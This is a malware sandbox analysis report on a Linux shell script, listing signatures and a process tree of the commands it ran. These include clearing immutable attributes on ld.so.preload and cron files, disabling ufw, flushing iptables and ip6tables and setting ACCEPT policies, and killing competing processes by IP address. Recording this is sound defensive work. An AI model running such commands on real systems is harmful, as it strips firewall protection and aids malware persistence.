Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

  • max time kernel
    530s
  • max time network
    1805s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  • submitted
    25-02-2024 14:29

General

  • Target

    script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh

  • Size

    11KB

  • MD5

    07b7746b922cf7d7fa821123a226ed36

  • SHA1

    bf2df8f2813ef4e2cf61ea193e091b808aa854c7

  • SHA256

    063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1

  • SHA512

    ad29993a88c996f96fdc5c01fda89400b1e27228c58445d181dc6af974a171ee36e014d90aa8e09de6d83e4bfd12d167eb361bd52b6d194af6f249a6812019cb

  • SSDEEP

    192:Xws08k5tkd5DFPSV3n7/e867jNKvSbRXA8kWmk4lkCIkvUgoaES8DSWOlA+1esP:XQwL4/e867USbRXA8kWT4yCtvUgDjdWi

Malware Config

Signatures

  • Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

    Malware can modify the dynamic linker's configuration file to preload malicious libraries into every executed process.

  • Flushes firewall rules 2 IoCs

    Flushes/disables firewall rules inside the Linux kernel.

  • Loads a kernel module 1 IoCs

    Loads a Linux kernel module, potentially to achieve persistence.

  • Reads EFI boot settings 2 IoCs

    Reads EFI boot settings from the efivars filesystem, which may contain security secrets or sensitive data.

  • Attempts to change immutable files 64 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 50 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies systemd 1 TTPs 1 IoCs

    Adds/modifies systemd service files, likely to achieve persistence.

  • Reads CPU attributes 1 TTPs 44 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 4 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
    /tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
    1⤵
    • Modifies the dynamic linker configuration file
    • Modifies systemd
    PID:1476
    • /usr/bin/chattr
      chattr -i /etc/ld.so.preload
      2⤵
      • Attempts to change immutable files
      PID:1477
    • /usr/bin/rm
      rm -f /etc/ld.so.preload
      2⤵
        PID:1478
      • /usr/bin/chattr
        chattr -R -i /var/spool/cron
        2⤵
        • Attempts to change immutable files
        PID:1479
      • /usr/bin/chattr
        chattr -i /etc/crontab
        2⤵
        • Attempts to change immutable files
        PID:1480
      • /usr/sbin/ufw
        ufw disable
        2⤵
        • Flushes firewall rules
        PID:1481
        • /usr/sbin/iptables
          /usr/sbin/iptables -V
          3⤵
            PID:1488
          • /lib/ufw/ufw-init
            /lib/ufw/ufw-init force-stop
            3⤵
            • Attempts to change immutable files
            PID:1489
            • /sbin/ip6tables
              ip6tables -L INPUT -n
              4⤵
                PID:1490
                • /sbin/modprobe
                  /sbin/modprobe ip6_tables
                  5⤵
                  • Loads a kernel module
                  • Enumerates kernel/hardware configuration
                  PID:1491
              • /sbin/iptables
                iptables -F ufw-logging-deny
                4⤵
                  PID:1493
                • /sbin/iptables
                  iptables -F ufw-logging-allow
                  4⤵
                    PID:1497
                  • /sbin/iptables
                    iptables -F ufw-not-local
                    4⤵
                      PID:1498
                    • /sbin/iptables
                      iptables -F ufw-user-logging-input
                      4⤵
                      • Attempts to change immutable files
                      PID:1499
                    • /sbin/iptables
                      iptables -F ufw-user-limit-accept
                      4⤵
                        PID:1500
                      • /sbin/iptables
                        iptables -F ufw-user-limit
                        4⤵
                          PID:1501
                        • /sbin/iptables
                          iptables -F ufw-skip-to-policy-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1502
                        • /sbin/iptables
                          iptables -F ufw-reject-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1503
                        • /sbin/iptables
                          iptables -F ufw-after-logging-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1504
                        • /sbin/iptables
                          iptables -F ufw-after-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1505
                        • /sbin/iptables
                          iptables -F ufw-user-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1506
                        • /sbin/iptables
                          iptables -F ufw-before-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1507
                        • /sbin/iptables
                          iptables -F ufw-before-logging-input
                          4⤵
                          • Attempts to change immutable files
                          PID:1508
                        • /sbin/iptables
                          iptables -F ufw-skip-to-policy-forward
                          4⤵
                            PID:1509
                          • /sbin/iptables
                            iptables -F ufw-reject-forward
                            4⤵
                              PID:1510
                            • /sbin/iptables
                              iptables -F ufw-after-logging-forward
                              4⤵
                                PID:1511
                              • /sbin/iptables
                                iptables -F ufw-after-forward
                                4⤵
                                  PID:1512
                                • /sbin/iptables
                                  iptables -F ufw-user-logging-forward
                                  4⤵
                                    PID:1513
                                  • /sbin/iptables
                                    iptables -F ufw-user-forward
                                    4⤵
                                      PID:1514
                                    • /sbin/iptables
                                      iptables -F ufw-before-forward
                                      4⤵
                                        PID:1515
                                      • /sbin/iptables
                                        iptables -F ufw-before-logging-forward
                                        4⤵
                                          PID:1516
                                        • /sbin/iptables
                                          iptables -F ufw-track-forward
                                          4⤵
                                            PID:1517
                                          • /sbin/iptables
                                            iptables -F ufw-track-output
                                            4⤵
                                              PID:1518
                                            • /sbin/iptables
                                              iptables -F ufw-track-input
                                              4⤵
                                              • Attempts to change immutable files
                                              PID:1519
                                            • /sbin/iptables
                                              iptables -F ufw-skip-to-policy-output
                                              4⤵
                                                PID:1520
                                              • /sbin/iptables
                                                iptables -F ufw-reject-output
                                                4⤵
                                                  PID:1521
                                                • /sbin/iptables
                                                  iptables -F ufw-after-logging-output
                                                  4⤵
                                                    PID:1522
                                                  • /sbin/iptables
                                                    iptables -F ufw-after-output
                                                    4⤵
                                                      PID:1523
                                                    • /sbin/iptables
                                                      iptables -F ufw-user-logging-output
                                                      4⤵
                                                        PID:1524
                                                      • /sbin/iptables
                                                        iptables -F ufw-user-output
                                                        4⤵
                                                          PID:1525
                                                        • /sbin/iptables
                                                          iptables -F ufw-before-output
                                                          4⤵
                                                            PID:1526
                                                          • /sbin/iptables
                                                            iptables -F ufw-before-logging-output
                                                            4⤵
                                                              PID:1527
                                                            • /sbin/iptables
                                                              iptables -Z ufw-logging-deny
                                                              4⤵
                                                                PID:1528
                                                              • /sbin/iptables
                                                                iptables -Z ufw-logging-allow
                                                                4⤵
                                                                  PID:1529
                                                                • /sbin/iptables
                                                                  iptables -Z ufw-not-local
                                                                  4⤵
                                                                    PID:1530
                                                                  • /sbin/iptables
                                                                    iptables -Z ufw-user-logging-input
                                                                    4⤵
                                                                    • Attempts to change immutable files
                                                                    PID:1531
                                                                  • /sbin/iptables
                                                                    iptables -Z ufw-user-limit-accept
                                                                    4⤵
                                                                      PID:1532
                                                                    • /sbin/iptables
                                                                      iptables -Z ufw-user-limit
                                                                      4⤵
                                                                        PID:1533
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-skip-to-policy-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1534
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-reject-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1535
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-after-logging-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1536
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-after-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1537
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-user-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1538
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-before-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1539
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-before-logging-input
                                                                        4⤵
                                                                        • Attempts to change immutable files
                                                                        PID:1540
                                                                      • /sbin/iptables
                                                                        iptables -Z ufw-skip-to-policy-forward
                                                                        4⤵
                                                                          PID:1541
                                                                        • /sbin/iptables
                                                                          iptables -Z ufw-reject-forward
                                                                          4⤵
                                                                            PID:1542
                                                                          • /sbin/iptables
                                                                            iptables -Z ufw-after-logging-forward
                                                                            4⤵
                                                                              PID:1543
                                                                            • /sbin/iptables
                                                                              iptables -Z ufw-after-forward
                                                                              4⤵
                                                                                PID:1544
                                                                              • /sbin/iptables
                                                                                iptables -Z ufw-user-logging-forward
                                                                                4⤵
                                                                                  PID:1545
                                                                                • /sbin/iptables
                                                                                  iptables -Z ufw-user-forward
                                                                                  4⤵
                                                                                    PID:1546
                                                                                  • /sbin/iptables
                                                                                    iptables -Z ufw-before-forward
                                                                                    4⤵
                                                                                      PID:1547
                                                                                    • /sbin/iptables
                                                                                      iptables -Z ufw-before-logging-forward
                                                                                      4⤵
                                                                                        PID:1548
                                                                                      • /sbin/iptables
                                                                                        iptables -Z ufw-track-forward
                                                                                        4⤵
                                                                                          PID:1549
                                                                                        • /sbin/iptables
                                                                                          iptables -Z ufw-track-output
                                                                                          4⤵
                                                                                            PID:1550
                                                                                          • /sbin/iptables
                                                                                            iptables -Z ufw-track-input
                                                                                            4⤵
                                                                                            • Attempts to change immutable files
                                                                                            PID:1552
                                                                                          • /sbin/iptables
                                                                                            iptables -Z ufw-skip-to-policy-output
                                                                                            4⤵
                                                                                              PID:1553
                                                                                            • /sbin/iptables
                                                                                              iptables -Z ufw-reject-output
                                                                                              4⤵
                                                                                                PID:1554
                                                                                              • /sbin/iptables
                                                                                                iptables -Z ufw-after-logging-output
                                                                                                4⤵
                                                                                                  PID:1555
                                                                                                • /sbin/iptables
                                                                                                  iptables -Z ufw-after-output
                                                                                                  4⤵
                                                                                                    PID:1557
                                                                                                  • /sbin/iptables
                                                                                                    iptables -Z ufw-user-logging-output
                                                                                                    4⤵
                                                                                                      PID:1558
                                                                                                    • /sbin/iptables
                                                                                                      iptables -Z ufw-user-output
                                                                                                      4⤵
                                                                                                        PID:1559
                                                                                                      • /sbin/iptables
                                                                                                        iptables -Z ufw-before-output
                                                                                                        4⤵
                                                                                                          PID:1560
                                                                                                        • /sbin/iptables
                                                                                                          iptables -Z ufw-before-logging-output
                                                                                                          4⤵
                                                                                                            PID:1561
                                                                                                          • /sbin/iptables
                                                                                                            iptables -X ufw-logging-deny
                                                                                                            4⤵
                                                                                                              PID:1562
                                                                                                            • /sbin/iptables
                                                                                                              iptables -X ufw-logging-allow
                                                                                                              4⤵
                                                                                                                PID:1563
                                                                                                              • /sbin/iptables
                                                                                                                iptables -X ufw-not-local
                                                                                                                4⤵
                                                                                                                  PID:1564
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -X ufw-user-logging-input
                                                                                                                  4⤵
                                                                                                                  • Attempts to change immutable files
                                                                                                                  PID:1565
                                                                                                                • /sbin/iptables
                                                                                                                  iptables -X ufw-user-logging-output
                                                                                                                  4⤵
                                                                                                                    PID:1566
                                                                                                                  • /sbin/iptables
                                                                                                                    iptables -X ufw-user-logging-forward
                                                                                                                    4⤵
                                                                                                                      PID:1567
                                                                                                                    • /sbin/iptables
                                                                                                                      iptables -X ufw-user-limit-accept
                                                                                                                      4⤵
                                                                                                                        PID:1568
                                                                                                                      • /sbin/iptables
                                                                                                                        iptables -X ufw-user-limit
                                                                                                                        4⤵
                                                                                                                          PID:1569
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -X ufw-user-input
                                                                                                                          4⤵
                                                                                                                          • Attempts to change immutable files
                                                                                                                          PID:1571
                                                                                                                        • /sbin/iptables
                                                                                                                          iptables -X ufw-user-forward
                                                                                                                          4⤵
                                                                                                                            PID:1573
                                                                                                                          • /sbin/iptables
                                                                                                                            iptables -X ufw-user-output
                                                                                                                            4⤵
                                                                                                                              PID:1574
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -X ufw-skip-to-policy-input
                                                                                                                              4⤵
                                                                                                                              • Attempts to change immutable files
                                                                                                                              PID:1575
                                                                                                                            • /sbin/iptables
                                                                                                                              iptables -X ufw-skip-to-policy-output
                                                                                                                              4⤵
                                                                                                                                PID:1576
                                                                                                                              • /sbin/iptables
                                                                                                                                iptables -X ufw-skip-to-policy-forward
                                                                                                                                4⤵
                                                                                                                                  PID:1577
                                                                                                                                • /sbin/iptables
                                                                                                                                  iptables -P INPUT ACCEPT
                                                                                                                                  4⤵
                                                                                                                                    PID:1578
                                                                                                                                  • /sbin/iptables
                                                                                                                                    iptables -P OUTPUT ACCEPT
                                                                                                                                    4⤵
                                                                                                                                      PID:1579
                                                                                                                                    • /sbin/iptables
                                                                                                                                      iptables -P FORWARD ACCEPT
                                                                                                                                      4⤵
                                                                                                                                        PID:1580
                                                                                                                                      • /sbin/ip6tables
                                                                                                                                        ip6tables -F ufw6-logging-deny
                                                                                                                                        4⤵
                                                                                                                                          PID:1581
                                                                                                                                        • /sbin/ip6tables
                                                                                                                                          ip6tables -F ufw6-logging-allow
                                                                                                                                          4⤵
                                                                                                                                            PID:1582
                                                                                                                                          • /sbin/ip6tables
                                                                                                                                            ip6tables -F ufw6-not-local
                                                                                                                                            4⤵
                                                                                                                                              PID:1583
                                                                                                                                            • /sbin/ip6tables
                                                                                                                                              ip6tables -F ufw6-user-logging-input
                                                                                                                                              4⤵
                                                                                                                                              • Attempts to change immutable files
                                                                                                                                              PID:1584
                                                                                                                                            • /sbin/ip6tables
                                                                                                                                              ip6tables -F ufw6-user-limit-accept
                                                                                                                                              4⤵
                                                                                                                                                PID:1585
                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                ip6tables -F ufw6-user-limit
                                                                                                                                                4⤵
                                                                                                                                                  PID:1586
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-skip-to-policy-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1587
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-reject-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1588
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-after-logging-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1589
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-after-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1590
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-user-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1591
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-before-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1592
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-before-logging-input
                                                                                                                                                  4⤵
                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                  PID:1593
                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                  ip6tables -F ufw6-skip-to-policy-forward
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1594
                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                    ip6tables -F ufw6-reject-forward
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1595
                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                      ip6tables -F ufw6-after-logging-forward
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1596
                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                        ip6tables -F ufw6-after-forward
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1597
                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                          ip6tables -F ufw6-user-logging-forward
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1598
                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                            ip6tables -F ufw6-user-forward
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1599
                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                              ip6tables -F ufw6-before-forward
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1600
                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                ip6tables -F ufw6-before-logging-forward
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:1601
                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                  ip6tables -F ufw6-track-forward
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1602
                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                    ip6tables -F ufw6-track-output
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1603
                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                      ip6tables -F ufw6-track-input
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                      PID:1604
                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                      ip6tables -F ufw6-skip-to-policy-output
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1605
                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                        ip6tables -F ufw6-reject-output
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:1606
                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                          ip6tables -F ufw6-after-logging-output
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1607
                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                            ip6tables -F ufw6-after-output
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1608
                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                              ip6tables -F ufw6-user-logging-output
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1609
                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                ip6tables -F ufw6-user-output
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1610
                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                  ip6tables -F ufw6-before-output
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1611
                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                    ip6tables -F ufw6-before-logging-output
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1612
                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                      ip6tables -Z ufw6-logging-deny
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1613
                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                        ip6tables -Z ufw6-logging-allow
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1614
                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                          ip6tables -Z ufw6-not-local
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:1615
                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                            ip6tables -Z ufw6-user-logging-input
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                            PID:1616
                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                            ip6tables -Z ufw6-user-limit-accept
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1617
                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                              ip6tables -Z ufw6-user-limit
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:1618
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-skip-to-policy-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1619
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-reject-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1620
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-after-logging-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1621
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-after-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1622
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-user-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1623
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-before-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1624
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-before-logging-input
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                PID:1625
                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                ip6tables -Z ufw6-skip-to-policy-forward
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1626
                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                  ip6tables -Z ufw6-reject-forward
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:1627
                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                    ip6tables -Z ufw6-after-logging-forward
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1628
                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                      ip6tables -Z ufw6-after-forward
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1629
                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                        ip6tables -Z ufw6-user-logging-forward
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:1630
                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                          ip6tables -Z ufw6-user-forward
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1631
                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                            ip6tables -Z ufw6-before-forward
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1633
                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                              ip6tables -Z ufw6-before-logging-forward
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1635
                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                ip6tables -Z ufw6-track-forward
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:1636
                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                  ip6tables -Z ufw6-track-output
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1638
                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                    ip6tables -Z ufw6-track-input
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                    PID:1639
                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                    ip6tables -Z ufw6-skip-to-policy-output
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1641
                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                      ip6tables -Z ufw6-reject-output
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:1642
                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                        ip6tables -Z ufw6-after-logging-output
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1644
                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                          ip6tables -Z ufw6-after-output
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1645
                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                            ip6tables -Z ufw6-user-logging-output
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1647
                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                              ip6tables -Z ufw6-user-output
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1648
                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                ip6tables -Z ufw6-before-output
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:1650
                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                  ip6tables -Z ufw6-before-logging-output
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:1651
                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                    ip6tables -X ufw6-logging-deny
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:1653
                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                      ip6tables -X ufw6-logging-allow
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1654
                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                        ip6tables -X ufw6-not-local
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1655
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -X ufw6-user-logging-input
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                          PID:1657
                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                          ip6tables -X ufw6-user-logging-output
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1659
                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                            ip6tables -X ufw6-user-logging-forward
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:1660
                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                              ip6tables -X ufw6-user-limit-accept
  4⤵
  PID:1662
• /sbin/ip6tables
  ip6tables -X ufw6-user-limit
  4⤵
  PID:1664
• /sbin/ip6tables
  ip6tables -X ufw6-user-input
  4⤵
  • Attempts to change immutable files
  PID:1665
• /sbin/ip6tables
  ip6tables -X ufw6-user-forward
  4⤵
  PID:1667
• /sbin/ip6tables
  ip6tables -X ufw6-user-output
  4⤵
  PID:1668
• /sbin/ip6tables
  ip6tables -X ufw6-skip-to-policy-input
  4⤵
  • Attempts to change immutable files
  PID:1670
• /sbin/ip6tables
  ip6tables -X ufw6-skip-to-policy-output
  4⤵
  PID:1671
• /sbin/ip6tables
  ip6tables -X ufw6-skip-to-policy-forward
  4⤵
  PID:1673
• /sbin/ip6tables
  ip6tables -P INPUT ACCEPT
  4⤵
  PID:1674
• /sbin/ip6tables
  ip6tables -P OUTPUT ACCEPT
  4⤵
  PID:1675
• /sbin/ip6tables
  ip6tables -P FORWARD ACCEPT
  4⤵
  PID:1676
• /usr/sbin/iptables
  iptables -F
  2⤵
  • Flushes firewall rules
  PID:1679
• /usr/bin/id
  id -u
  2⤵
  PID:1680
• /usr/bin/grep
  grep -v grep
  2⤵
  PID:1684
• /usr/bin/grep
  grep -e /dev
  2⤵
  PID:1683
• /usr/bin/ls
  ls -la /etc
  2⤵
  PID:1682
• /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1694
• /usr/bin/grep
  grep -v grep
  2⤵
  PID:1693
• /usr/bin/grep
  grep agetty
  2⤵
  PID:1692
• /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  • Attempts to change immutable files
  PID:1695
• /usr/bin/ps
  ps aux
  2⤵
  • Reads CPU attributes
  • Reads runtime system information
  PID:1691
• /usr/bin/pkill
  pkill -f 42.112.28.216
  2⤵
  • Reads CPU attributes
  • Reads runtime system information
  PID:1707
• /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  • Attempts to change immutable files
  PID:1713
• /usr/bin/grep
  grep -v -
  2⤵
  PID:1712
• /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1710
• /usr/bin/grep
  grep 207.38.87.6
  2⤵
  PID:1709
• /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1711
• /usr/bin/grep
  grep -v -
  2⤵
  PID:1718
• /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  • Attempts to change immutable files
  PID:1719
• /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1716
• /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1717
• /usr/bin/grep
                                                                                                                                                                                                                                                                                        grep 127.0.0.1:52018
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:1715
                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                          PID:1725
                                                                                                                                                                                                                                                                                        • /usr/bin/grep
